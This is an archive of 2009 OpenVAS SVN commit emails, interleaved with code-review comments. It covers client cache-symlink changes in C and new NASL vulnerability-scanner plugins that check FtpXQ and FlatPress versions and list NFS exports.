From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Tue, 6 Oct 2009 13:57:01 +0200 (CEST) Subject: [Openvas-commits] r5404 - in trunk/openvas-client: . openvas openvas/prefs_dialog Message-ID: <20091006115701.E47C3861EACF@pyrosoma.intevation.org> Author: mattm Date: 2009-10-06 13:57:00 +0200 (Tue, 06 Oct 2009) New Revision: 5404 Modified: trunk/openvas-client/ChangeLog trunk/openvas-client/openvas/context.c trunk/openvas-client/openvas/prefs_dialog/prefs_scope_tree.c Log: * openvas/prefs_dialog/prefs_scope_tree.c (create_omp_scope): Symlink NVT cache instead of copying it. Turn off saving of report NVT cache. * openvas/context.c (context_new): Symlink NVT to parent cache instead of saving cache to disk. Modified: trunk/openvas-client/ChangeLog =================================================================== --- trunk/openvas-client/ChangeLog 2009-10-06 11:55:47 UTC (rev 5403) +++ trunk/openvas-client/ChangeLog 2009-10-06 11:57:00 UTC (rev 5404) @@ -1,5 +1,13 @@ 2009-10-06 Matthew Mundell + * openvas/prefs_dialog/prefs_scope_tree.c (create_omp_scope): Symlink + NVT cache instead of copying it. Turn off saving of report NVT cache. + + * openvas/context.c (context_new): Symlink NVT to parent cache instead of + saving cache to disk. + +2009-10-06 Matthew Mundell + * openvas/prefs_dialog/prefs_scope_tree.c (scopetree_refresh): Remove verbose flag setting. Correct indentation. Modified: trunk/openvas-client/openvas/context.c =================================================================== --- trunk/openvas-client/openvas/context.c 2009-10-06 11:55:47 UTC (rev 5403) +++ trunk/openvas-client/openvas/context.c 2009-10-06 11:57:00 UTC (rev 5404) 
@@ -856,7 +856,38 @@ if (copied_plugins) if (prefs_get_int (Global, "cache_plugin_information") > 0) { - plugin_cache_write (context, context->plugins_md5sum); + int pwd; + + /* Symbolic link the server NVT cache into the scope. */ + + pwd = open (".", O_RDONLY); + if (pwd == -1) + { + show_error_and_wait (_("%s: failed to open current directory"), + __FUNCTION__); + return NULL; + } + + if (chdir (context->dir)) + { + show_error_and_wait (_("%s: failed to chdir to %s"), + context->dir, + __FUNCTION__); + return NULL; + } + + if (symlink ("../openvas_nvt_cache", "openvas_nvt_cache")) + { + show_error_and_wait (_("%s: failed to symlink to parent NVT cache"), + __FUNCTION__); + return NULL; + } + + if (fchdir (pwd)) + show_error_and_wait (_("%s: failed to fchdir back to previous dir"), + __FUNCTION__); + + close (pwd); } #endif /* USE_OMP */ Modified: trunk/openvas-client/openvas/prefs_dialog/prefs_scope_tree.c =================================================================== --- trunk/openvas-client/openvas/prefs_dialog/prefs_scope_tree.c 2009-10-06 11:55:47 UTC (rev 5403) +++ trunk/openvas-client/openvas/prefs_dialog/prefs_scope_tree.c 2009-10-06 11:57:00 UTC (rev 5404) @@ -950,6 +950,8 @@ assert (context->type == CONTEXT_SERVER); + g_free (servers_dir_name); + if (server_dir_name == NULL) { show_error (_("%s: server dir is NULL"), __FUNCTION__); @@ -968,7 +970,6 @@ if (g_mkdir_with_parents (*scope_dir_name, 0700 /* d-w-rwxr-- */) == -1) { show_error (_("%s: g_mkdir_with_parents"), __FUNCTION__); - g_free (servers_dir_name); return -2; } @@ -979,7 +980,6 @@ { show_error (_("%s: g_file_set_contents"), __FUNCTION__); g_free (file_name); - g_free (servers_dir_name); return -3; } @@ -1006,7 +1006,6 @@ // FIX note error g_error_free (error); g_free (file_name); - g_free (servers_dir_name); return -4; } 
@@ -1036,52 +1035,49 @@ // FIX note error g_error_free (error); g_free (file_name); - g_free (servers_dir_name); return -5; } } g_free (file_name); - /* Copy server NVT cache into scope. */ - { - gchar *cache = NULL; - gsize cache_size; + int pwd; - file_name = g_build_filename (server_dir_name, - "openvas_nvt_cache", - NULL); - ok = g_file_get_contents (file_name, &cache, &cache_size, NULL); - if (ok) + /* Symbolic link the server NVT cache into the scope. */ + + pwd = open (".", O_RDONLY); + if (pwd == -1) { - g_free (servers_dir_name); - g_free (file_name); + show_error_and_wait (_("%s: failed to open current directory"), + __FUNCTION__); + return NULL; + } - file_name = g_build_filename (*scope_dir_name, - "openvas_nvt_cache", - NULL); - ok = g_file_set_contents (file_name, cache, cache_size, NULL); - g_free (file_name); - g_free (cache); - - if (ok) - return 0; - - show_error (_("%s: set contents"), __FUNCTION__); - return -1; + if (chdir (*scope_dir_name)) + { + show_error_and_wait (_("%s: failed to chdir to %s"), + context->dir, + __FUNCTION__); + return NULL; } - else + + if (symlink ("../openvas_nvt_cache", "openvas_nvt_cache")) { - show_error (_("%s: get contents"), __FUNCTION__); - g_free (servers_dir_name); - g_free (file_name); - return -1; + show_error_and_wait (_("%s: failed to symlink to parent NVT cache"), + __FUNCTION__); + return NULL; } + + if (fchdir (pwd)) + show_error_and_wait (_("%s: failed to fchdir back to previous dir"), + __FUNCTION__); + + close (pwd); } } - g_free (servers_dir_name); + show_error (_("%s: check_is_dir"), __FUNCTION__); return -1; } @@ -1141,6 +1137,8 @@ g_free (file_name); if (!ok) goto fail; + /* Turned off for now to reduce disk usage. */ +#if 0 file_name = g_build_filename (scope_dir_name, "openvas_nvt_cache", NULL); ok = g_file_get_contents (file_name, &rcfile, &rcfile_len, NULL); g_free (file_name); 
@@ -1148,6 +1146,7 @@ file_name = g_build_filename (report_dir_name, "openvas_nvt_cache", NULL); ok = g_file_set_contents (file_name, rcfile, strlen (rcfile), NULL); g_free (file_name); +#endif if (ok) { From scm-commit at wald.intevation.org Tue Oct 6 15:28:39 2009 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Tue, 6 Oct 2009 15:28:39 +0200 (CEST) Subject: [Openvas-commits] r5405 - trunk/openvas-packaging/openvas-scanner/debian/trunk/debian Message-ID: <20091006132839.4E2C585D9F72@pyrosoma.intevation.org> Author: mwiegand Date: 2009-10-06 15:28:38 +0200 (Tue, 06 Oct 2009) New Revision: 5405 Modified: trunk/openvas-packaging/openvas-scanner/debian/trunk/debian/changelog Log: Corrected email address. Modified: trunk/openvas-packaging/openvas-scanner/debian/trunk/debian/changelog =================================================================== --- trunk/openvas-packaging/openvas-scanner/debian/trunk/debian/changelog 2009-10-06 11:57:00 UTC (rev 5404) +++ trunk/openvas-packaging/openvas-scanner/debian/trunk/debian/changelog 2009-10-06 13:28:38 UTC (rev 5405) @@ -5,7 +5,7 @@ * openvas-scanner.init: Removed superfluous "-D" (now obsolete since becoming a daemon is the default behaviour). - -- Michael Wiegand Tue, 06 Oct 2009 13:53:08 +0200 + -- Michael Wiegand Tue, 06 Oct 2009 13:53:08 +0200 openvas-scanner (3.0.0.beta2-2) UNRELEASED; urgency=low From scm-commit at wald.intevation.org Tue Oct 6 17:09:40 2009 
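Review bot: In context_new (openvas/context.c, r5404), the early returns after a failed `chdir (context->dir)` or `symlink (...)` leave the `pwd` descriptor open, and the symlink failure path also returns with the process still inside `context->dir`. Call `fchdir (pwd)` and `close (pwd)` on every exit path, for instance through a single cleanup label. The chdir error call also passes its arguments in the wrong order: the format is `%s: failed to chdir to %s` but the arguments are `context->dir, __FUNCTION__`.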
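Review bot: In create_omp_scope (prefs_scope_tree.c, hunk @@ -1036,52 +1035,49 @@), the new symlink block has no success return. The removed copy code returned 0 once the cache was written, but as far as the hunk shows, execution after `close (pwd);` runs on into `show_error (_("%s: check_is_dir"), __FUNCTION__); return -1;`, so a successful symlink is reported as a failure; add `return 0;` after the close. The error paths use `return NULL;` in a function whose other returns are negative ints (-2 to -5), which converts to 0 and reads as success to a caller testing the int, so return a negative code there. The early returns also leave `pwd` open, the `show_error_and_wait` arguments for the chdir message are swapped, and that message prints `context->dir` although the call changes to `*scope_dir_name`.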
From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Tue, 6 Oct 2009 17:09:40 +0200 (CEST) Subject: [Openvas-commits] r5406 - in trunk/openvas-client: . openvas/prefs_dialog Message-ID: <20091006150940.1E49A852FE2A@pyrosoma.intevation.org> Author: jan Date: 2009-10-06 17:09:37 +0200 (Tue, 06 Oct 2009) New Revision: 5406 Modified: trunk/openvas-client/ChangeLog trunk/openvas-client/openvas/prefs_dialog/prefs_scope_tree.c Log: * openvas/prefs_dialog/prefs_scope_tree.c (scope_menu_save): Renamed default filename from nessusrc to openvasrc. Modified: trunk/openvas-client/ChangeLog =================================================================== --- trunk/openvas-client/ChangeLog 2009-10-06 13:28:38 UTC (rev 5405) +++ trunk/openvas-client/ChangeLog 2009-10-06 15:09:37 UTC (rev 5406) @@ -1,3 +1,8 @@ +2009-10-06 Jan-Oliver Wagner + + * openvas/prefs_dialog/prefs_scope_tree.c (scope_menu_save): Renamed + default filename from nessusrc to openvasrc. + 2009-10-06 Matthew Mundell * openvas/prefs_dialog/prefs_scope_tree.c (create_omp_scope): Symlink Modified: trunk/openvas-client/openvas/prefs_dialog/prefs_scope_tree.c =================================================================== --- trunk/openvas-client/openvas/prefs_dialog/prefs_scope_tree.c 2009-10-06 13:28:38 UTC (rev 5405) +++ trunk/openvas-client/openvas/prefs_dialog/prefs_scope_tree.c 2009-10-06 15:09:37 UTC (rev 5406) @@ -842,7 +842,7 @@ if(parent) gtk_window_set_transient_for(GTK_WINDOW(dialog), parent); prefs_context_update(context_by_type(Context, CONTEXT_SCOPE)); - gtk_file_selection_set_filename(GTK_FILE_SELECTION(dialog), "nessusrc"); + gtk_file_selection_set_filename(GTK_FILE_SELECTION(dialog), "openvasrc"); g_signal_connect(GTK_FILE_SELECTION(dialog)->ok_button, "clicked", G_CALLBACK(scope_menu_save_ok), dialog); g_signal_connect_swapped(GTK_FILE_SELECTION(dialog)->cancel_button, From scm-commit at wald.intevation.org Tue Oct 6 18:45:46 2009 
From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Tue, 6 Oct 2009 18:45:46 +0200 (CEST) Subject: [Openvas-commits] r5407 - in trunk/openvas-plugins: . scripts Message-ID: <20091006164546.27471861EAB2@pyrosoma.intevation.org> Author: mime Date: 2009-10-06 18:45:43 +0200 (Tue, 06 Oct 2009) New Revision: 5407 Added: trunk/openvas-plugins/scripts/FtpXQ_36391.nasl trunk/openvas-plugins/scripts/flatpress_36543.nasl trunk/openvas-plugins/scripts/flatpress_detect.nasl trunk/openvas-plugins/scripts/showmount.nasl Modified: trunk/openvas-plugins/ChangeLog trunk/openvas-plugins/cve_current.txt trunk/openvas-plugins/scripts/ms_smb2_highid.nasl Log: Added new plugins Modified: trunk/openvas-plugins/ChangeLog =================================================================== --- trunk/openvas-plugins/ChangeLog 2009-10-06 15:09:37 UTC (rev 5406) +++ trunk/openvas-plugins/ChangeLog 2009-10-06 16:45:43 UTC (rev 5407) @@ -1,3 +1,17 @@ +2009-10-06 Michael Meyer + + * scripts/flatpress_36543.nasl, + scripts/FtpXQ_36391.nasl, + scripts/flatpress_detect.nasl: + Added new plugins. + + * scripts/ms_smb2_highid.nasl: + Changed script_category to ACT_KILL_HOST. Removed unneeded + dependencies. + + * scripts/showmount.nasl: + Added plugin developed by LSS Security Team. + 2009-10-06 Chandrashekhar B * scripts/wmi_rsop.inc: Modified: trunk/openvas-plugins/cve_current.txt =================================================================== --- trunk/openvas-plugins/cve_current.txt 2009-10-06 15:09:37 UTC (rev 5406) +++ trunk/openvas-plugins/cve_current.txt 2009-10-06 16:45:43 UTC (rev 5407) 
@@ -109,5 +109,6 @@ CVE-2009-3510 SecPod CVE-2009-3541 SecPod CVE-2009-3484 SecPod +36543 Greenbone svn R +36391 Greenbone svn R - Added: trunk/openvas-plugins/scripts/FtpXQ_36391.nasl =================================================================== --- trunk/openvas-plugins/scripts/FtpXQ_36391.nasl 2009-10-06 15:09:37 UTC (rev 5406) +++ trunk/openvas-plugins/scripts/FtpXQ_36391.nasl 2009-10-06 16:45:43 UTC (rev 5407) 
@@ -0,0 +1,88 @@ +############################################################################### +# OpenVAS Vulnerability Test +# $Id$ +# +# DataWizard FtpXQ Remote Denial of Service Vulnerability +# +# Authors: +# Michael Meyer +# +# Copyright: +# Copyright (c) 2009 Greenbone Networks GmbH +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2 +# (or any later version), as published by the Free Software Foundation. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +############################################################################### + +if (description) +{ + script_id(100293); + script_bugtraq_id(36391); + script_version ("1.0-$Revision$"); + + script_name("DataWizard FtpXQ Remote Denial of Service Vulnerability"); + +desc = "Overview: +FtpXQ is prone to a remote denial-of-service vulnerability. + +Remote attackers can cause the affected server to stop responding, +denying service to legitimate users. + +FtpXQ 3.0 is vulnerable; other versions may also be affected. 
+ +References: +http://www.securityfocus.com/bid/36391 +http://www.datawizard.net + +Risk factor : Medium"; + + script_description(desc); + script_summary("Determine if FtpXQ version is 3.0"); + script_category(ACT_GATHER_INFO); + script_family("FTP"); + script_copyright("This script is Copyright (C) 2009 Greenbone Networks GmbH"); + script_dependencies("find_service.nes","secpod_ftp_anonymous.nasl","ftpserver_detect_type_nd_version.nasl"); + script_require_ports("Services/ftp", 21); + exit(0); +} + +include("ftp_func.inc"); +include("version_func.inc"); + +port = get_kb_item("Services/ftp"); +if(!port){ + port = 21; +} + +if(get_kb_item('ftp/'+port+'/broken'))exit(0); + +if(!get_port_state(port)){ + exit(0); +} + +if(!banner = get_ftp_banner(port:port))exit(0); + +if("FtpXQ" >!< banner)exit(0); + +version = eregmatch(string: banner, pattern:"Version ([0-9.]+)"); + +if(!isnull(version[1])) { + if(version_is_equal(version: version[1], test_version: "3.0")) { + security_warning(port:port); + } +} + + +exit(0); + + Property changes on: trunk/openvas-plugins/scripts/FtpXQ_36391.nasl ___________________________________________________________________ Name: svn:keywords + Id Revision Added: trunk/openvas-plugins/scripts/flatpress_36543.nasl =================================================================== --- trunk/openvas-plugins/scripts/flatpress_36543.nasl 2009-10-06 15:09:37 UTC (rev 5406) +++ trunk/openvas-plugins/scripts/flatpress_36543.nasl 2009-10-06 16:45:43 UTC (rev 5407) 
@@ -0,0 +1,92 @@ +############################################################################### +# OpenVAS Vulnerability Test +# $Id$ +# +# FlatPress 'userid' Parameter Local File Include Vulnerability +# +# Authors: +# Michael Meyer +# +# Copyright: +# Copyright (c) 2009 Greenbone Networks GmbH +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2 +# (or any later version), as published by the Free Software Foundation. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +############################################################################### + +if (description) +{ + script_id(100295); + script_bugtraq_id(36543); + script_version ("1.0-$Revision$"); + + script_name("FlatPress 'userid' Parameter Local File Include Vulnerability"); + +desc = "Overview: +FlatPress is prone to a local file-include vulnerability because it +fails to properly sanitize user-supplied input. + +An attacker can exploit this vulnerability to obtain potentially +sensitive information and execute arbitrary local scripts in the +context of the webserver process. This may allow the attacker to +compromise the application and the underlying computer; other attacks +are also possible. + +FlatPress 0.804 through 0.812.1 are vulnerable. + +Solution: +The vendor has released an update. Please see the references +for details. 
+ +References: +http://www.securityfocus.com/bid/36543 +https://sourceforge.net/project/shownotes.php?group_id=157089&release_id=628765 +http://www.securityfocus.com/archive/1/506816 + + +Risk factor : Medium"; + + script_description(desc); + script_summary("Determine if FlatPress is prone to a local file-include vulnerability"); + script_category(ACT_GATHER_INFO); + script_family("Web application abuses"); + script_copyright("This script is Copyright (C) 2009 Greenbone Networks GmbH"); + script_dependencies("flatpress_detect.nasl"); + script_require_ports("Services/www", 80); + script_exclude_keys("Settings/disable_cgi_scanning"); + exit(0); +} + +include("http_func.inc"); +include("http_keepalive.inc"); +include("version_func.inc"); + +port = get_http_port(default:80); +if(!get_port_state(port))exit(0); + +if(!can_host_php(port:port)) exit(0); + +if(!version = get_kb_item(string("www/", port, "/flatpress")))exit(0); +if(!matches = eregmatch(string:version, pattern:"^(.+) under (/.*)$"))exit(0); + +vers = matches[1]; +if(!isnull(vers) && vers >!< "unknown") { + + if(version_in_range(version: vers, test_version: "0.804", test_version2: "0.812.1")) { + security_warning(port:port); + exit(0); + } + +} + +exit(0); Property changes on: trunk/openvas-plugins/scripts/flatpress_36543.nasl ___________________________________________________________________ Name: svn:keywords + Id Revision Added: trunk/openvas-plugins/scripts/flatpress_detect.nasl =================================================================== --- trunk/openvas-plugins/scripts/flatpress_detect.nasl 2009-10-06 15:09:37 UTC (rev 5406) +++ trunk/openvas-plugins/scripts/flatpress_detect.nasl 2009-10-06 16:45:43 UTC (rev 5407) 
@@ -0,0 +1,110 @@ +############################################################################### +# OpenVAS Vulnerability Test +# $Id$ +# +# Flatpress Detection +# +# Authors: +# Michael Meyer +# +# Copyright: +# Copyright (c) 2009 Greenbone Networks GmbH +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2 +# (or any later version), as published by the Free Software Foundation. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +############################################################################### + +# need desc here to modify it later in script. +desc = "Overview: +This host is running Flatpress, an open-source blogging engine. 
+ +See also: +http://www.flatpress.org + +Risk factor : None"; + +if (description) +{ + script_id(100294); + script_version ("1.0-$Revision$"); + + script_name("Flatpress Detection"); + script_description(desc); + script_summary("Checks for the presence of Flatpress"); + script_category(ACT_GATHER_INFO); + script_family("Service detection"); + script_copyright("This script is Copyright (C) 2009 Greenbone Networks GmbH"); + script_dependencies("find_service.nes", "http_version.nasl"); + script_require_ports("Services/www", 80); + script_exclude_keys("Settings/disable_cgi_scanning"); + exit(0); +} + + +include("http_func.inc"); +include("http_keepalive.inc"); +include("global_settings.inc"); + +port = get_http_port(default:80); + +if(!get_port_state(port))exit(0); +if(!can_host_php(port:port))exit(0); + +dirs = make_list("/flatpress","/blog",cgi_dirs()); + +foreach dir (dirs) { + + url = string(dir, "/index.php"); + req = http_get(item:url, port:port); + buf = http_keepalive_send_recv(port:port, data:req, bodyonly:FALSE); + if( buf == NULL )continue; + + if(egrep(pattern: "powered by ]>FlatPress", string: buf, icase: TRUE) || + egrep(pattern: 'meta name="generator" content="FlatPress', string: buf, icase: TRUE)) + { + if(strlen(dir)>0) { + install=dir; + } else { + install=string("/"); + } + + vers = string("unknown"); + ### try to get version + version = eregmatch(string: buf, pattern: 'FlatPress fp-([0-9.]+[^"]*)',icase:TRUE); + + if ( !isnull(version[1]) ) { + vers=chomp(version[1]); + } + + set_kb_item(name: string("www/", port, "/flatpress"), value: string(vers," under ",install)); + + info = string("None\n\nFlatPress Version '"); + info += string(vers); + info += string("' was detected on the remote host in the following directory(s):\n\n"); + info += string(install, "\n"); + + desc = ereg_replace( + string:desc, + pattern:"None$", + replace:info + ); + + if(report_verbosity > 0) { + security_note(port:port,data:desc); + } + exit(0); + + } +} +exit(0); + 
Property changes on: trunk/openvas-plugins/scripts/flatpress_detect.nasl ___________________________________________________________________ Name: svn:keywords + Id Revision Modified: trunk/openvas-plugins/scripts/ms_smb2_highid.nasl =================================================================== --- trunk/openvas-plugins/scripts/ms_smb2_highid.nasl 2009-10-06 15:09:37 UTC (rev 5406) +++ trunk/openvas-plugins/scripts/ms_smb2_highid.nasl 2009-10-06 16:45:43 UTC (rev 5407) @@ -72,16 +72,15 @@ script_description(desc); script_summary("Determine if Microsoft Windows is prone to a remote code-execution vulnerability"); - script_category(ACT_GATHER_INFO); + script_category(ACT_KILL_HOST); script_family("Windows"); script_copyright("This script is Copyright (C) 2009 Greenbone Networks GmbH"); - script_dependencies("find_service.nes", "smtpserver_detect.nasl"); + script_dependencies("find_service.nes"); script_require_ports(445); exit(0); } include("misc_func.inc"); -include("network_func.inc"); if(safe_checks())exit(0); Added: trunk/openvas-plugins/scripts/showmount.nasl =================================================================== --- trunk/openvas-plugins/scripts/showmount.nasl 2009-10-06 15:09:37 UTC (rev 5406) +++ trunk/openvas-plugins/scripts/showmount.nasl 2009-10-06 16:45:43 UTC (rev 5407) 
@@ -0,0 +1,217 @@ +################################################################### +# OpenVAS Network Vulnerability Test +# $Id$ +# +# Showmount +# +# LSS-NVT-2009-014 +# +# Developed by LSS Security Team +# +# Copyright (C) 2009 LSS +# +# This program is free software: you can redistribute it and/or +# modify it under the terms of the GNU General Public License as +# published by the Free Software Foundation, either version 2 of +# the License, or (at your option) any later version. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public +# License along with this program. If not, see +# . +################################################################### +if(description) +{ + script_id(102014); + script_version ("1.0-$Revision$"); + script_cve_id("CVE-1999-0554", "CVE-1999-0548"); + script_name("NFS export"); + + desc = " +This plugin lists NFS exported shares, and warns if some of +them are readable. + +It also warns if the remote NFS server is superfluous. + +Tested on Ubuntu/Debian mountd + +References: + rfc 1057 + rfc 1094 + +Thanks to Wireshark! 
+ +Risk factor : Low / Medium"; + + script_description(desc); + script_summary("Checks for NFS shares"); + script_category(ACT_GATHER_INFO); + script_family("Remote file access"); + script_dependencie("secpod_rpc_portmap.nasl"); + script_require_keys("rpc/portmap"); + exit(0); +} + +include("misc_func.inc"); +include("nfs_func.inc"); + +#mountd program number and version + +RPC_MOUNTD = 100005; +RPC_MOUNTD_VERSION = 1; +RPC_NFSD = 100003; +####RPC MOUNT EXPORT function#### +# PURPOSE: obtains the targets export list by sending an RPC CALL message to EXPORT procedure of mountd +# ARGUMENT: -port- on which the mountd daemon is listening +# -protocol- IPPROTO_UDP(default) or IPPROTO_TCP +# RETURN: returns the NFSd daemons export list as defined in rfc 1094 (Appendix A) +# null on error + + +function rpc_mountd_export(port,protocol){ + + XID = raw_string(0x01,0x23,0x45,0x67);#rpc message ID, should be the same as reply xid + RPC_CALL = raw_string(0x00,0x00,0x00,0x00);#call message = 0 + RPC_VERSION = raw_string(0x00,0x00,0x00,0x02);#current RPC version = 2 + RPC_PROG = raw_string(0x00,0x01,0x86,0xa5);#mountd program number = 100005 + RPC_PROG_VERSION = raw_string(0x00,0x00,0x00,0x01);#mountd program version = 1 + RPC_PROCEDURE = raw_string(0x00,0x00,0x00,0x05);#mountd export procedure number = 5 + RPC_CREDENTIALS_FLAVOR = raw_string(0x00,0x00,0x00,0x00);#credentials flavor = AUTH_NULL = 0 + RPC_CREDENTIALS_LENGTH = raw_string(0x00,0x00,0x00,0x00);#credentials length = 0 + RPC_VERIFIER_FLAVOR = raw_string(0x00,0x00,0x00,0x00);#verifier flavor = AUTH_NULL = 0 + RPC_VERIFIER_LENGTH = raw_string(0x00,0x00,0x00,0x00);#verifier length = 0 + + rpc_mountd_export_call = XID + + RPC_CALL + + RPC_VERSION + + RPC_PROG + + RPC_PROG_VERSION + + RPC_PROCEDURE + + RPC_CREDENTIALS_FLAVOR + + RPC_CREDENTIALS_LENGTH + + RPC_VERIFIER_FLAVOR + + RPC_VERIFIER_LENGTH; + if(isnull(protocol)){ + protocol = IPPROTO_UDP; + } + MSS = 1460; #data len to read at most (maximum segment size for 
ethernet) + rpc_mountd_export_reply = NULL; + if(protocol == IPPROTO_UDP){ + udp_sock = open_sock_udp(port); + if(isnull(udp_sock)) { + log_message("rpc_mountd_export: Error opening socket on udp port " + port); + return NULL; + } + send(socket: udp_sock, data: rpc_mountd_export_call); + rpc_mountd_export_reply = recv(socket: udp_sock, length: MSS); + close(udp_sock); + }else if(protocol == IPPROTO_TCP){ + tcp_sock = open_sock_tcp(port); + if(isnull(tcp_sock)){ + log_message("rpc_mountd_export: Error opening socket on tcp port " + port); + return NULL; + } + send(socket: tcp_sock, data: rpc_mountd_export_call); + rpc_mountd_export_reply = recv(socket: tcp_sock, length: MSS); + close(tcp_sock); + }else { + log_message("rpc_mountd_export: Invalid protocol"); + return NULL; + } + + if(isnull(rpc_mountd_export_reply)){ + log_message("rpc_mountd_export: No reply message"); + return NULL; + } + + #RPC reply + reply_xid = substr(rpc_mountd_export_reply,0,3); + if(reply_xid != XID){ + log_message("rpc_mountd_export: xid don't match"); + return NULL; + } + reply_msg_type = substr(rpc_mountd_export_reply,4,7); + if(reply_msg_type != raw_string(0x00, 0x00, 0x00, 0x01)){ + log_message("rpc_mountd_export: Not a reply message"); + return NULL; + } + reply_reply_state = substr(rpc_mountd_export_reply,8,11); + if(reply_reply_state != raw_string(0x00, 0x00, 0x00, 0x00)){ + log_message("rpc_mountd_export: Call was denied by the server"); + return NULL; + } + reply_verifier_flavor = substr(rpc_mountd_export_reply,12,15); + reply_verifier_length = substr(rpc_mountd_export_reply,16,19); + reply_accept_state = substr(rpc_mountd_export_reply,20,23); + if(reply_accept_state != raw_string(0x00, 0x00, 0x00, 0x00)){ + log_message("rpc_mountd_export: Remote procedure returned an error"); + return NULL; + } + #MOUNTD exportlist + reply_mountd_exportlist = substr(rpc_mountd_export_reply,24); + return reply_mountd_exportlist; +} + +####MAIN#### + +RPC_MOUNTD_port = get_rpc_port(program: 
RPC_MOUNTD, protocol: IPPROTO_UDP); +RPC_NFSD_port = get_rpc_port(program: RPC_NFSD, protocol: IPPROTO_UDP); + +#display("NFSD: " + RPC_NFSD_port + '\n'); +#display("MOUNTD port: " + RPC_MOUNTD_port + '\n'); + +export_list = rpc_mountd_export(port: RPC_MOUNTD_port, protocol: IPPROTO_UDP); #using UDP because get_rpc_port is written only for udp ports +if(isnull(export_list)){ + log_message("rpc_mountd_export: FAIL!"); + exit(-1); +}else{ + VALUE_FOLLOWS = raw_string(0x00, 0x00, 0x00, 0x01); + LEFT = 0; RIGHT = 3; + export_value_follows = substr(export_list, LEFT, RIGHT); + while(export_value_follows == VALUE_FOLLOWS){ + LEFT = RIGHT + 1; + RIGHT = LEFT + 3; + export_dirpath_length = str2long(val: substr(export_list, LEFT,RIGHT), idx: 0); + LEFT = RIGHT + 1; + RIGHT = LEFT + export_dirpath_length - 1; + export_dirpath = substr(export_list, LEFT, RIGHT); + LEFT = RIGHT + padsz(len: export_dirpath_length) + 1; + RIGHT = LEFT + 3; + groups_value_follows = substr(export_list, LEFT, RIGHT); + groups = ""; + while(groups_value_follows == VALUE_FOLLOWS){ + LEFT = RIGHT + 1; + RIGHT = LEFT + 3; + groups_length = str2long(val: substr(export_list, LEFT,RIGHT), idx: 0); + LEFT = RIGHT + 1; + RIGHT = LEFT + groups_length - 1; + groups = groups + substr(export_list, LEFT, RIGHT); + LEFT = RIGHT + padsz(len: groups_length) + 1; + RIGHT = LEFT + 3; + groups_value_follows = substr(export_list, LEFT, RIGHT); + } + LEFT = RIGHT + 1; + RIGHT = LEFT + 3; + export_value_follows = substr(export_list, LEFT,RIGHT); + insstr(groups, '\0', strlen(groups) - 1); + list += export_dirpath + ' ' + groups + '\n'; + set_kb_item(name:"nfs/exportlist", value:export_dirpath); + } +} + +proto = "udp"; +if(isnull(list)){ + report = 'You are running a superfluous NFS daemon.\nYou should consider removing it\n'; + security_note(port:RPC_NFSD_port, data:report, proto:proto); + #display(report); + exit(0); +}else{ + report = 'Here is the export list of ' + get_host_name() + ' : \n' + list; + 
security_note(port:RPC_NFSD_port, data:report, proto:proto); + #display(report); + exit(0); +} Property changes on: trunk/openvas-plugins/scripts/showmount.nasl ___________________________________________________________________ Name: svn:keywords + Id Revision From scm-commit at wald.intevation.org Wed Oct 7 00:38:58 2009 
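Review bot: In flatpress_36543.nasl, the test `vers >!< "unknown"` uses the substring operator with its operands the other way round from the rest of this patch (compare `"FtpXQ" >!< banner` in FtpXQ_36391.nasl): it checks that vers does not occur inside the string "unknown", not that vers differs from it. Use `vers != "unknown"` so the guard matches the sentinel that flatpress_detect.nasl stores in the KB.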
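Review bot: In showmount.nasl, the export-list loop in the MAIN section takes `export_dirpath_length` and `groups_length` straight from the reply via `str2long` and uses them to advance LEFT and RIGHT without checking them against `strlen(export_list)`. The reply comes from the scanned host and is read with a single `recv` of at most MSS (1460) bytes, so a truncated or malformed list should end the loop with a logged error instead of being sliced further. Two smaller points: the result of `insstr(groups, '\0', strlen(groups) - 1);` is discarded, so that line has no effect, and the TCP branch of rpc_mountd_export sends the same bytes as the UDP branch, without the record mark that RPC over TCP requires (RFC 1057, which the description cites).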
